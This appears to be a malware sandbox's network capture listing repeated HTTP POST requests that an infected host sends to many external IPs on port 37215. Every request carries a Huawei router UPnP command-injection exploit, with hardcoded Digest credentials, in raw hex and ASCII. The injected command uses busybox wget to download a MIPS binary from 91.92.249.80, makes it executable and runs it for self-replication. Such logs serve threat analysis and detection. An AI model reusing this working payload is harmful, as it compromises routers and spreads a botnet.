                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1308192.168.2.2357768197.68.117.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329044104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1309192.168.2.23420782.163.184.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329056978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1310192.168.2.233310841.29.134.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329066992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1311192.168.2.2341406157.64.201.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329579115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1312192.168.2.233950441.194.29.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329581976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1313192.168.2.2356858216.118.143.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329597950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1314192.168.2.234001441.162.76.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329603910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1315192.168.2.2349710157.164.99.8637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329973936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1316192.168.2.235380241.64.62.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.329999924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1317192.168.2.234327241.225.246.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330010891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
